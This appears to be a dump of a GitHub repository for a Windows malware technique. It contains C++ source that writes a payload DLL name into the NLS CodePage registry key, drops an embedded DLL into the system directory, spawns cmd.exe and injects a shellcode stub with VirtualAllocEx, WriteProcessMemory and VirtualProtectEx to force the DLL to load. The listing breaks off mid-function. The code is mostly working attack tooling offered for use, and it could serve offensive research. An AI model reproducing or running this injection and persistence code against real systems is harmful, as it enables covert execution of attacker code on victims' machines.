├── .gitattributes ├── .gitignore ├── NLSRegistryCodeInjection.sln ├── NLSRegistryCodeInjection ├── NLSRegistryCodeInjection.aps ├── NLSRegistryCodeInjection.cpp ├── NLSRegistryCodeInjection.rc ├── NLSRegistryCodeInjection.vcxproj ├── NLSRegistryCodeInjection.vcxproj.filters ├── NLSRegistryCodeInjection.vcxproj.user ├── PayloadDll.dll ├── headers.hpp ├── payload.cpp ├── payload.hpp └── resource1.h ├── README.md └── ShellcodeInjection ├── ShellcodeInjection.asm ├── ShellcodeInjection.cpp ├── ShellcodeInjection.obj ├── ShellcodeInjection.vcxproj ├── ShellcodeInjection.vcxproj.filters ├── ShellcodeInjection.vcxproj.user ├── all sections └── shellcode.bin ├── defs.h ├── mllink$.lnk └── x64 └── Release ├── ShellcodeInjection.Build.CppClean.log ├── ShellcodeInjection.exe.recipe ├── ShellcodeInjection.log └── ShellcodeInjection.vcxproj.FileListAbsolute.txt /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | 2 | NLSRegistryCodeInjection/x64/Debug/NLSRegis.97c68020.tlog/CL.command.1.tlog 3 | NLSRegistryCodeInjection/x64/Debug/NLSRegis.97c68020.tlog/CL.read.1.tlog 4 | NLSRegistryCodeInjection/x64/Debug/NLSRegis.97c68020.tlog/CL.write.1.tlog 5 | NLSRegistryCodeInjection/x64/Debug/NLSRegis.97c68020.tlog/link.command.1.tlog 6 | NLSRegistryCodeInjection/x64/Debug/NLSRegis.97c68020.tlog/link.read.1.tlog 7 | NLSRegistryCodeInjection/x64/Debug/NLSRegis.97c68020.tlog/link.write.1.tlog 8 | NLSRegistryCodeInjection/x64/Debug/NLSRegis.97c68020.tlog/NLSRegistryCodeInjection.lastbuildstate 9 | NLSRegistryCodeInjection/x64/Debug/NLSRegis.97c68020.tlog/rc.command.1.tlog 10 | NLSRegistryCodeInjection/x64/Debug/NLSRegis.97c68020.tlog/rc.read.1.tlog 11 | 
NLSRegistryCodeInjection/x64/Debug/NLSRegis.97c68020.tlog/rc.write.1.tlog 12 | NLSRegistryCodeInjection/x64/Debug/NLSRegistryCodeInjection.exe.recipe 13 | NLSRegistryCodeInjection/x64/Debug/NLSRegistryCodeInjection.ilk 14 | NLSRegistryCodeInjection/x64/Debug/NLSRegistryCodeInjection.log 15 | NLSRegistryCodeInjection/x64/Debug/NLSRegistryCodeInjection.obj 16 | NLSRegistryCodeInjection/x64/Debug/NLSRegistryCodeInjection.res 17 | NLSRegistryCodeInjection/x64/Debug/payload.obj 18 | NLSRegistryCodeInjection/x64/Debug/vc143.idb 19 | NLSRegistryCodeInjection/x64/Debug/vc143.pdb 20 | x64/Debug/NLSRegistryCodeInjection.exe 21 | x64/Debug/NLSRegistryCodeInjection.pdb 22 | .vs/NLSRegistryCodeInjection/v17/Solution.VC.db 23 | .vs/NLSRegistryCodeInjection/project-colors.json 24 | .vs/NLSRegistryCodeInjection/v17/.suo 25 | .vs/NLSRegistryCodeInjection/v17/Browse.VC.db 26 | .vs/NLSRegistryCodeInjection/v17/Browse.VC.db-shm 27 | .vs/NLSRegistryCodeInjection/v17/Browse.VC.db-wal 28 | .vs/NLSRegistryCodeInjection/v17/Browse.VC.opendb 29 | .vs/NLSRegistryCodeInjection/v17/ipch/AutoPCH/5381e99c08273369/PAYLOAD.ipch 30 | .vs/NLSRegistryCodeInjection/v17/ipch/AutoPCH/bd9db43f0c603519/NLSREGISTRYCODEINJECTION.ipch 31 | .vs/NLSRegistryCodeInjection/v17/Solution.VC.db-shm 32 | .vs/NLSRegistryCodeInjection/v17/Solution.VC.db-wal 33 | ShellcodeInjection/x64/Debug/Shellcod.4225c8d1.tlog/CL.command.1.tlog 34 | x64/Debug/ShellcodeInjection.pdb 35 | ShellcodeInjection/x64/Debug/vc143.pdb 36 | ShellcodeInjection/x64/Debug/Shellcod.4225c8d1.tlog/CL.read.1.tlog 37 | ShellcodeInjection/x64/Debug/Shellcod.4225c8d1.tlog/CL.write.1.tlog 38 | ShellcodeInjection/x64/Debug/Shellcod.4225c8d1.tlog/link.command.1.tlog 39 | ShellcodeInjection/x64/Debug/Shellcod.4225c8d1.tlog/link.read.1.tlog 40 | ShellcodeInjection/x64/Debug/Shellcod.4225c8d1.tlog/link.write.1.tlog 41 | ShellcodeInjection/x64/Debug/Shellcod.4225c8d1.tlog/ShellcodeInjection.lastbuildstate 42 | 
ShellcodeInjection/x64/Debug/ShellcodeInjection.exe.recipe 43 | ShellcodeInjection/x64/Debug/ShellcodeInjection.ilk 44 | ShellcodeInjection/x64/Debug/ShellcodeInjection.log 45 | ShellcodeInjection/x64/Debug/ShellcodeInjection.obj 46 | ShellcodeInjection/x64/Debug/vc143.idb 47 | x64/Debug/ShellcodeInjection.exe 48 | .vs/NLSRegistryCodeInjection/v17/ipch/AutoPCH/9c904366e5e24bf3/PAYLOAD.ipch 49 | NLSRegistryCodeInjection/x64/Release/NLSRegis.97c68020.tlog/CL.command.1.tlog 50 | NLSRegistryCodeInjection/x64/Release/NLSRegis.97c68020.tlog/CL.read.1.tlog 51 | NLSRegistryCodeInjection/x64/Release/NLSRegis.97c68020.tlog/link.command.1.tlog 52 | NLSRegistryCodeInjection/x64/Release/NLSRegis.97c68020.tlog/link.write.1.tlog 53 | NLSRegistryCodeInjection/x64/Release/NLSRegis.97c68020.tlog/NLSRegistryCodeInjection.lastbuildstate 54 | NLSRegistryCodeInjection/x64/Release/NLSRegis.97c68020.tlog/rc.command.1.tlog 55 | NLSRegistryCodeInjection/x64/Release/NLSRegis.97c68020.tlog/rc.read.1.tlog 56 | NLSRegistryCodeInjection/x64/Release/NLSRegis.97c68020.tlog/rc.write.1.tlog 57 | NLSRegistryCodeInjection/x64/Release/NLSRegistryCodeInjection.iobj 58 | NLSRegistryCodeInjection/x64/Release/NLSRegistryCodeInjection.ipdb 59 | NLSRegistryCodeInjection/x64/Release/NLSRegistryCodeInjection.obj 60 | NLSRegistryCodeInjection/x64/Release/NLSRegistryCodeInjection.res 61 | NLSRegistryCodeInjection/x64/Release/payload.obj 62 | NLSRegistryCodeInjection/x64/Release/vc143.pdb 63 | x64/Release/NLSRegistryCodeInjection.exe 64 | x64/Release/NLSRegistryCodeInjection.pdb 65 | -------------------------------------------------------------------------------- /NLSRegistryCodeInjection.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.0.32002.185 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = 
"NLSRegistryCodeInjection", "NLSRegistryCodeInjection\NLSRegistryCodeInjection.vcxproj", "{97C68020-174C-46C3-ABED-A71AC954AF56}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ShellcodeInjection", "ShellcodeInjection\ShellcodeInjection.vcxproj", "{4225C8D1-E331-4436-BA0C-4F8051B8CBDF}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | Release|x64 = Release|x64 15 | Release|x86 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {97C68020-174C-46C3-ABED-A71AC954AF56}.Debug|x64.ActiveCfg = Debug|x64 19 | {97C68020-174C-46C3-ABED-A71AC954AF56}.Debug|x64.Build.0 = Debug|x64 20 | {97C68020-174C-46C3-ABED-A71AC954AF56}.Debug|x86.ActiveCfg = Debug|Win32 21 | {97C68020-174C-46C3-ABED-A71AC954AF56}.Debug|x86.Build.0 = Debug|Win32 22 | {97C68020-174C-46C3-ABED-A71AC954AF56}.Release|x64.ActiveCfg = Release|x64 23 | {97C68020-174C-46C3-ABED-A71AC954AF56}.Release|x64.Build.0 = Release|x64 24 | {97C68020-174C-46C3-ABED-A71AC954AF56}.Release|x86.ActiveCfg = Release|Win32 25 | {97C68020-174C-46C3-ABED-A71AC954AF56}.Release|x86.Build.0 = Release|Win32 26 | {4225C8D1-E331-4436-BA0C-4F8051B8CBDF}.Debug|x64.ActiveCfg = Debug|x64 27 | {4225C8D1-E331-4436-BA0C-4F8051B8CBDF}.Debug|x64.Build.0 = Debug|x64 28 | {4225C8D1-E331-4436-BA0C-4F8051B8CBDF}.Debug|x86.ActiveCfg = Debug|Win32 29 | {4225C8D1-E331-4436-BA0C-4F8051B8CBDF}.Debug|x86.Build.0 = Debug|Win32 30 | {4225C8D1-E331-4436-BA0C-4F8051B8CBDF}.Release|x64.ActiveCfg = Release|x64 31 | {4225C8D1-E331-4436-BA0C-4F8051B8CBDF}.Release|x64.Build.0 = Release|x64 32 | {4225C8D1-E331-4436-BA0C-4F8051B8CBDF}.Release|x86.ActiveCfg = Release|Win32 33 | {4225C8D1-E331-4436-BA0C-4F8051B8CBDF}.Release|x86.Build.0 = Release|Win32 34 | EndGlobalSection 35 | GlobalSection(SolutionProperties) = preSolution 36 | HideSolutionNode = FALSE 37 | EndGlobalSection 38 | 
GlobalSection(ExtensibilityGlobals) = postSolution 39 | SolutionGuid = {1249E4BF-71B7-41C3-A888-72271D162739} 40 | EndGlobalSection 41 | EndGlobal 42 | -------------------------------------------------------------------------------- /NLSRegistryCodeInjection/NLSRegistryCodeInjection.aps: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzhsec/NlsCodeInjectionThroughRegistry/2b9ebbe3c4f203d16f537080009f9c0992916277/NLSRegistryCodeInjection/NLSRegistryCodeInjection.aps -------------------------------------------------------------------------------- /NLSRegistryCodeInjection/NLSRegistryCodeInjection.cpp: -------------------------------------------------------------------------------- 1 | #include "payload.hpp" 2 | #include "headers.hpp" 3 | 4 | //Pending: Make initializer_list cleaner 5 | uint32_t main(void) 6 | { 7 | std::initializer_list list = { L"SYSTEM\\ControlSet001\\Control\\Nls\\CodePage", L"Payload.dll" , L""}; 8 | auto regObj = std::make_unique(list); 9 | if (OpenKeyForNlsModification(regObj.get())) 10 | { 11 | #ifdef DEBUG 12 | std::printf("Key has been modified, now preparing for injection\n"); 13 | #endif 14 | std::printf("Payload executed sucessfully :)\n"); 15 | system("pause"); 16 | } 17 | 18 | return EXIT_SUCCESS; 19 | } -------------------------------------------------------------------------------- /NLSRegistryCodeInjection/NLSRegistryCodeInjection.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzhsec/NlsCodeInjectionThroughRegistry/2b9ebbe3c4f203d16f537080009f9c0992916277/NLSRegistryCodeInjection/NLSRegistryCodeInjection.rc -------------------------------------------------------------------------------- /NLSRegistryCodeInjection/NLSRegistryCodeInjection.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 
12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {97c68020-174c-46c3-abed-a71ac954af56} 25 | NLSRegistryCodeInjection 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | stdcpp20 120 | 121 | 122 | Console 123 | true 124 | RequireAdministrator 125 | 126 | 127 | 128 | 129 | Level3 130 | true 131 | true 132 | true 133 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 134 | true 135 | stdcpp20 136 | Disabled 137 | 138 | 139 | Console 140 | true 141 | true 142 | true 143 | RequireAdministrator 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | -------------------------------------------------------------------------------- /NLSRegistryCodeInjection/NLSRegistryCodeInjection.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Archivos de origen 20 | 21 | 22 | Archivos de origen 23 | 24 | 25 | 26 | 27 | Archivos de encabezado 28 | 29 | 30 | Archivos de encabezado 31 | 32 | 33 | Archivos de encabezado 34 | 35 | 36 | 37 | 38 | Archivos de recursos 39 | 40 | 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /NLSRegistryCodeInjection/NLSRegistryCodeInjection.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /NLSRegistryCodeInjection/PayloadDll.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzhsec/NlsCodeInjectionThroughRegistry/2b9ebbe3c4f203d16f537080009f9c0992916277/NLSRegistryCodeInjection/PayloadDll.dll -------------------------------------------------------------------------------- /NLSRegistryCodeInjection/headers.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | #define MAX_STRING_VALUES 3 11 | #define MAX_LENGTH_PATH 200 12 | 13 | enum class Index : uint32_t 14 | { 15 | SUBKEY_KEY_VALUE, 16 | DLL_NAME, 17 | FULL_PAYLOAD_DLL_PATH 18 | }; 19 | 20 | enum class CodePageIDIndex : uint32_t 21 | { 22 | CodePageInt, 23 | CodePageHex 24 | }; 25 | 26 | struct IndexingStringValues 27 | { 28 | std::wstring StringValues[MAX_STRING_VALUES]; 29 | Index IDs[MAX_STRING_VALUES]; 30 | }; 31 | 32 | class ShellcodeInjector { 33 | public: 34 | //Methods 35 | //1.-Create memory and write memory in other process. Allocate contiguous buffer for pointers to the virtual addresses. 36 | ShellcodeInjector() { 37 | 38 | } 39 | //Create And Write Memory. 
40 | //void CreateAndWriteMemory(HANDLE hProcess, ) {} 41 | //2.-Execute thread based on member. 42 | 43 | private: 44 | void** m_pBlocksMemory; 45 | uint32_t m_numberOfBlocks; 46 | }; 47 | 48 | 49 | 50 | typedef class RegistryManipulation 51 | { 52 | public: 53 | RegistryManipulation(std::initializer_list l) 54 | { 55 | assert(l.size() <= MAX_STRING_VALUES); 56 | for (auto [i, j] = std::tuple{ 0, l.begin() }; i < l.size(); i++, j++) 57 | { 58 | keyValues.StringValues[i] = *j; 59 | keyValues.IDs[i] = static_cast(i); 60 | } 61 | hSubkeyNls = NULL; 62 | m_CodePageIdHex = NULL; 63 | m_CodePageIdInt = NULL; 64 | ZeroMemory(&m_procInfo, sizeof(PROCESS_INFORMATION)); 65 | } 66 | const wchar_t* getStringBuffer(Index i) { 67 | for (auto index : keyValues.IDs) { 68 | if (i == index) { 69 | return keyValues.StringValues[static_cast(i)].c_str(); 70 | } 71 | } 72 | return nullptr; 73 | } 74 | bool compareStringEqual(Index i, std::wstring_view s) { 75 | for (auto index : keyValues.IDs){ 76 | if (i == index) { 77 | return keyValues.StringValues[static_cast(i)].compare(s) == 0; 78 | } 79 | } 80 | return false; 81 | } 82 | void setStringBuffer(wchar_t* str, Index index) { 83 | for (auto i : keyValues.IDs) { 84 | if (i == index) { 85 | keyValues.StringValues[static_cast(i)] = str; 86 | } 87 | } 88 | } 89 | size_t getStringSize(Index i) { 90 | for (auto index : keyValues.IDs) { 91 | if (i == index) { 92 | return keyValues.StringValues[static_cast(i)].size() * sizeof(wchar_t); 93 | } 94 | } 95 | return NULL; 96 | } 97 | void setCodePageID(uint32_t id, CodePageIDIndex i){ 98 | switch (i){ 99 | case CodePageIDIndex::CodePageInt: { 100 | m_CodePageIdInt = id; 101 | break; 102 | } 103 | case CodePageIDIndex::CodePageHex: 104 | { 105 | m_CodePageIdHex = id; 106 | break; 107 | } 108 | default: 109 | { 110 | std::printf("Invalid option for setting m_CodePage\n"); 111 | return; 112 | } 113 | } 114 | } 115 | uint32_t getCodePageID(CodePageIDIndex i){ 116 | switch (i){ 117 | case 
CodePageIDIndex::CodePageInt: 118 | { 119 | return m_CodePageIdInt; 120 | } 121 | case CodePageIDIndex::CodePageHex: 122 | { 123 | return m_CodePageIdHex; 124 | } 125 | default: 126 | { 127 | std::printf("Invalid option for setting m_CodePage\n"); 128 | return NULL; 129 | } 130 | } 131 | } 132 | ~RegistryManipulation() { 133 | for (auto key : keyValues.StringValues) { 134 | key = L""; 135 | } 136 | RegCloseKey(hSubkeyNls); 137 | hSubkeyNls = NULL; 138 | ZeroMemory(&m_procInfo, sizeof(PROCESS_INFORMATION)); 139 | } 140 | 141 | //public members: 142 | HKEY hSubkeyNls; 143 | PROCESS_INFORMATION m_procInfo; 144 | private: 145 | //Same for this one. 146 | IndexingStringValues keyValues; 147 | uint32_t m_CodePageIdHex, m_CodePageIdInt; 148 | //This can be passed as inheritance probably. 149 | ShellcodeInjector injector; 150 | }*PRegistryKey; 151 | -------------------------------------------------------------------------------- /NLSRegistryCodeInjection/payload.cpp: -------------------------------------------------------------------------------- 1 | #include "headers.hpp" 2 | #include "payload.hpp" 3 | #include "strsafe.h" 4 | #include "payload.hpp" 5 | #include "resource1.h" 6 | #define MAX_SIZE_DATA 260 7 | 8 | //IMPLEMENTED IT two different functions for convertion. 
9 | UINT StringToIntDecimal(PWCHAR str) noexcept 10 | { 11 | uint32_t num = _wtoi(str); 12 | return num; 13 | } 14 | UINT StringToInt(PWCHAR str) noexcept { 15 | 16 | wchar_t chrSubkey, chr, * j; 17 | UINT i; 18 | j = str; 19 | chrSubkey = *str; 20 | for (i = 0; *j; chrSubkey = *j) 21 | { 22 | ++j; 23 | if ((chrSubkey - 0x41) > 5u) 24 | { 25 | if ((chrSubkey - 0x30) > 9u) 26 | { 27 | if ((chrSubkey - 0x61) > 5u) 28 | return i; 29 | chr = chrSubkey - 87; 30 | } 31 | else 32 | { 33 | chr = chrSubkey - 0x30; 34 | } 35 | } 36 | else 37 | { 38 | chr = chrSubkey - 55; 39 | } 40 | i = chr + 16 * i; 41 | } 42 | return i; 43 | } 44 | BOOLEAN CompareLastElementString(PWCHAR str1, PWCHAR str2, BOOLEAN CaseInsensitive) 45 | { 46 | bool bResult = false; 47 | //Has to find .dll somewhere, in the substring, otherwise doesnt exist. 48 | wchar_t* dll = wcsstr(str1, str2); 49 | if (dll != nullptr) { 50 | bResult = true; 51 | } 52 | return bResult; 53 | } 54 | bool FindCodePageWithPayload(PRegistryKey regObject, UINT dwValuesCount, UINT dwMaxLenValues){ 55 | DWORD dwCountName = 0, typeData, ValueDataSize = 0; 56 | //uint32_t CodePageInt; 57 | WCHAR CodePageID[MAX_PATH], ValueData[MAX_SIZE_DATA]; 58 | bool bResult = false; 59 | 60 | for (UINT i = 0; i < dwValuesCount; i++) { 61 | dwCountName = 260; 62 | ValueDataSize = 260; 63 | LSTATUS status = RegEnumValueW(regObject->hSubkeyNls, i, CodePageID, &dwCountName, nullptr, &typeData, (BYTE*)&ValueData, 64 | &ValueDataSize); 65 | if (status != ERROR_SUCCESS && GetLastError() != ERROR_ALREADY_EXISTS) 66 | { 67 | std::wprintf(L"Could not query Code Page ID %s, Last error: [%x]\n", CodePageID, GetLastError()); 68 | continue; 69 | } 70 | #ifdef _DEBUG 71 | std::wprintf(L"Iterating: %d - %s = %s\n", i, CodePageID, ValueData); 72 | #endif 73 | if (typeData == REG_SZ && regObject->compareStringEqual(Index::DLL_NAME, ValueData)){ 74 | #ifdef _DEBUG 75 | std::wprintf(L"Payload value has been found!: %d - %s = %s\n", i, CodePageID, ValueData); 76 | 
#endif 77 | uint32_t strHex = std::stoull(CodePageID, nullptr, 10); 78 | uint32_t strDecimal = std::stoull(CodePageID, nullptr, 16); 79 | regObject->setCodePageID(strHex, CodePageIDIndex::CodePageInt); 80 | regObject->setCodePageID(strDecimal, CodePageIDIndex::CodePageHex); 81 | std::wprintf(L"Values: CodepageHex = %d, CodePageInt = 0x%x\n", strDecimal, strHex); 82 | bResult = true; 83 | break; 84 | } 85 | } 86 | return bResult; 87 | } 88 | 89 | bool IterateCodePageAndExtractProperId(PRegistryKey regObject) { 90 | DWORD dwMaxLenValues, dwCountName = 0, dwValuesCount, typeData, ValueDataSize = 0; 91 | uint32_t CodePageInt = NULL, posCount = NULL; 92 | bool correctRet = false; 93 | LSTATUS status; 94 | WCHAR CodePageID[MAX_PATH], ValueData[MAX_SIZE_DATA]; 95 | 96 | //Queries information for the NLS subkey, mostly related to the values, which is the part that interests us the most. 97 | if (::RegQueryInfoKeyW(regObject->hSubkeyNls, nullptr, nullptr, nullptr, 98 | nullptr, nullptr, nullptr, &dwValuesCount, &dwMaxLenValues, nullptr, nullptr, nullptr)) 99 | { 100 | std::cerr << "Could not query information for the key, last error is: " << GetLastError() << "\n"; 101 | return correctRet; 102 | } 103 | //Only one failing, lets fix it. 104 | if (FindCodePageWithPayload(regObject, dwValuesCount, dwMaxLenValues)){ 105 | correctRet = true; 106 | return correctRet; 107 | } 108 | //Find one with .dll, then from there increase one until it works out. 
109 | for (UINT i = 0; i < dwValuesCount; i++) { 110 | dwCountName = 260; 111 | ValueDataSize = 260; 112 | status = RegEnumValueW(regObject->hSubkeyNls, i, CodePageID, &dwCountName, nullptr, &typeData, (BYTE*)&ValueData, 113 | &ValueDataSize); 114 | if ((status != EXIT_SUCCESS) && (GetLastError() != ERROR_ALREADY_EXISTS)) 115 | { 116 | std::wprintf(L"Could not query Code Page ID %s, Last error: [%x]\n", CodePageID, status); 117 | continue; 118 | } 119 | #ifdef _DEBUG 120 | std::wprintf(L"Querying value i: %d, %s = %s\n", i, CodePageID, ValueData); 121 | #endif 122 | if (typeData == REG_SZ && CompareLastElementString(ValueData, const_cast(L".dll"), FALSE)) 123 | { 124 | #ifdef _DEBUG 125 | std::wprintf(L"Value with dll found in i = %d, %s = %s\n", i, CodePageID, ValueData); 126 | //Convert from str to hex 127 | CodePageInt = StringToInt(CodePageID); 128 | std::wprintf(L"Code page as int is: %x\n", CodePageInt); 129 | #endif // _DEBUG 130 | CodePageInt = StringToInt(CodePageID); 131 | posCount = i; 132 | break; 133 | } 134 | } 135 | if (CodePageInt == NULL) { 136 | std::printf("Could not find apropiate dll extension inside one of the subvalues\n"); 137 | return correctRet; 138 | } 139 | //FIX THIS CODE, WHEN PRINTING THERE IS SOMETHING THAT GOES WRONG. 140 | CodePageInt += 1; 141 | for (UINT i = 0; i < dwValuesCount - posCount; i++) { 142 | //2.Then we proceed to check if the code page ID value exists, if it doesnt, we create it and set the data. 
143 | if (SUCCEEDED(StringCchPrintfW(ValueData, MAX_SIZE_DATA, L"%04x", CodePageInt))) 144 | { 145 | std::printf("Trying to create in CodePage ID %x\n", CodePageInt); 146 | } 147 | status = RegQueryValueEx(regObject->hSubkeyNls, ValueData, NULL, NULL, NULL, NULL); 148 | if (status != ERROR_SUCCESS && status == ERROR_FILE_NOT_FOUND) 149 | { 150 | if (!RegSetValueExW(regObject->hSubkeyNls, ValueData, NULL, REG_SZ, (BYTE*)regObject->getStringBuffer(Index::DLL_NAME), 151 | regObject->getStringSize(Index::DLL_NAME))) 152 | { 153 | //std::wprintf(L"The string value of the data is: %s\n", ValueData); 154 | uint32_t CodePageDecimal = StringToIntDecimal(ValueData); 155 | std::printf("Sucessfully created dll payload in CodePage ID %x\n", CodePageInt); 156 | regObject->setCodePageID(CodePageInt, CodePageIDIndex::CodePageHex); 157 | regObject->setCodePageID(CodePageDecimal, CodePageIDIndex::CodePageInt); 158 | std::wprintf(L"Values: CodepageHex = %d, CodePageInt = 0x%x\n", CodePageInt, CodePageDecimal); 159 | correctRet = true; 160 | break; 161 | } 162 | } 163 | CodePageInt += 1; 164 | } 165 | return correctRet; 166 | } 167 | 168 | bool CreateProcessToInject(LPPROCESS_INFORMATION procInfo) { 169 | STARTUPINFOW infoProc; 170 | //PROCESS_INFORMATION processInfo; 171 | ZeroMemory(&infoProc, sizeof(infoProc)); 172 | infoProc.cb = sizeof(infoProc); 173 | ZeroMemory(procInfo, sizeof(procInfo)); 174 | wchar_t path[MAX_PATH]; 175 | GetSystemDirectoryW(path, MAX_PATH); 176 | wcscat_s(path, MAX_PATH, L"\\cmd.exe"); 177 | return CreateProcessW(NULL, path, NULL, NULL, false, CREATE_NEW_CONSOLE, NULL, NULL, &infoProc, procInfo) != NULL; 178 | } 179 | 180 | bool DropSystemDllPayload(PRegistryKey regObject) { 181 | HMODULE hMod = GetModuleHandleA(NULL); 182 | HRSRC hResource = FindResource(hMod, MAKEINTRESOURCE(IDR_RT_RCDATA1), L"RT_RCDATA"); 183 | if (hResource == NULL) 184 | { 185 | printf("Could not find the payload dll resource, exiting...\n"); 186 | return false; 187 | } 188 | DWORD 
dwSizeResource = SizeofResource(hMod, hResource); 189 | HGLOBAL hResLoaded = LoadResource(hMod, hResource); 190 | if (hResLoaded == NULL) 191 | { 192 | printf("Could not find the dll, exiting...\n"); 193 | return false; 194 | } 195 | auto pBuffer = static_cast (LockResource(hResLoaded)); 196 | LPWSTR pathPayload = new wchar_t[MAX_PATH]; 197 | GetSystemDirectoryW(pathPayload, MAX_PATH); 198 | wcscat_s(pathPayload, MAX_PATH, L"\\"); 199 | wcscat_s(pathPayload, MAX_PATH, regObject->getStringBuffer(Index::DLL_NAME)); 200 | regObject->setStringBuffer(pathPayload, Index::FULL_PAYLOAD_DLL_PATH); 201 | HANDLE hFile = CreateFileW(pathPayload, GENERIC_ALL, FILE_SHARE_DELETE, 202 | NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, nullptr); 203 | delete[] pathPayload; 204 | if (hFile == INVALID_HANDLE_VALUE) 205 | { 206 | if (GetLastError() == ERROR_FILE_EXISTS){ 207 | std::printf("File already exists, trying to set up registry.\n"); 208 | return true; 209 | } 210 | std::printf("Could not obtain HANDLE to the newly created FILE, last error is %d\n", GetLastError()); 211 | return false; 212 | } 213 | DWORD dwNumberBytesWritten; 214 | if (!WriteFile(hFile, pBuffer, dwSizeResource, &dwNumberBytesWritten, nullptr)) 215 | { 216 | std::printf("Could not write to file, last error is %d\n", GetLastError()); 217 | CloseHandle(hFile); 218 | return false; 219 | } 220 | CloseHandle(hFile); 221 | return true; 222 | } 223 | 224 | void SelfSpawnPayload(DWORD dwCodePageId) 225 | { 226 | if (!GetConsoleWindow()) 227 | { 228 | if (!AllocConsole()) { 229 | return; 230 | } 231 | } 232 | if (!SetConsoleOutputCP(dwCodePageId)) { 233 | std::printf("Could not self test injection in SetConsoleOutputCP, last error is: 0x%x\n", GetLastError()); 234 | return; 235 | } 236 | if (!SetConsoleCP(dwCodePageId)) { 237 | std::printf("Could not self test for SetConsoleCp: Last error is 0x%x\n", GetLastError()); 238 | return; 239 | } 240 | SetThreadUILanguage(0); 241 | } 242 | 243 | void InjectStagerToPayload(PRegistryKey 
regObject) { 244 | LPVOID lpCodePageID = (LPVOID)VirtualAllocEx(regObject->m_procInfo.hProcess, NULL, sizeof(DWORD), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 245 | if (lpCodePageID == nullptr) { 246 | std::printf("Could not allocate buffer in remote process\n"); 247 | return; 248 | } 249 | DWORD codePageID = regObject->getCodePageID(CodePageIDIndex::CodePageInt); 250 | if (!WriteProcessMemory(regObject->m_procInfo.hProcess, lpCodePageID, &codePageID, sizeof(DWORD), NULL)) { 251 | std::printf("Could not create write memory with codePageID to inject\n"); 252 | return; 253 | } 254 | //Alloc and write shellcode, easiest way is VirtualAllocEx + WPM, but we have to pass arg, so I am not so sure how I am going to do that... 255 | LPVOID ShellcodeMemory = (LPVOID)VirtualAllocEx(regObject->m_procInfo.hProcess, NULL, lengthInject, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 256 | if (ShellcodeMemory == nullptr) { 257 | std::printf("Could not allocate buffer in remote process\n"); 258 | return; 259 | } 260 | //This will write the payload in the remote process. 261 | if (!WriteProcessMemory(regObject->m_procInfo.hProcess, ShellcodeMemory, &StubInject, lengthInject, NULL)) { 262 | std::printf("Could not create write memory with codePageID to inject\n"); 263 | return; 264 | } 265 | //Need to change protection to EXECUTE_READ. 266 | DWORD dwProtection; 267 | if (!VirtualProtectEx(regObject->m_procInfo.hProcess, ShellcodeMemory, lengthInject, PAGE_EXECUTE_READ, &dwProtection)) { 268 | std::printf("Could not change protection of memory for shellcode injection. 
